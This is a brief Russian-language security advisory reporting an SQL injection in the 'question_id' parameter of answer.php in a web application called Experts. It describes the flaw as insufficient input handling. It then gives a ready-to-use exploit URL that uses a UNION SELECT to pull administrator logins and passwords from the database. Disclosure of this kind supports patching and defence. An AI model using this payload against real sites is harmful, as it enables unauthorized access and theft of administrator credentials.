Программа: Experts

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «question_id» сценарием answer.php.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://[Target]/[experts_path]/answer.php?question_id=41 AND 1=2 UNION SELECT
concat(administrator_login,0x3a,administrator_password), 2,3,4,5,6,7,8,9 FROM
administrator



Оставить мнение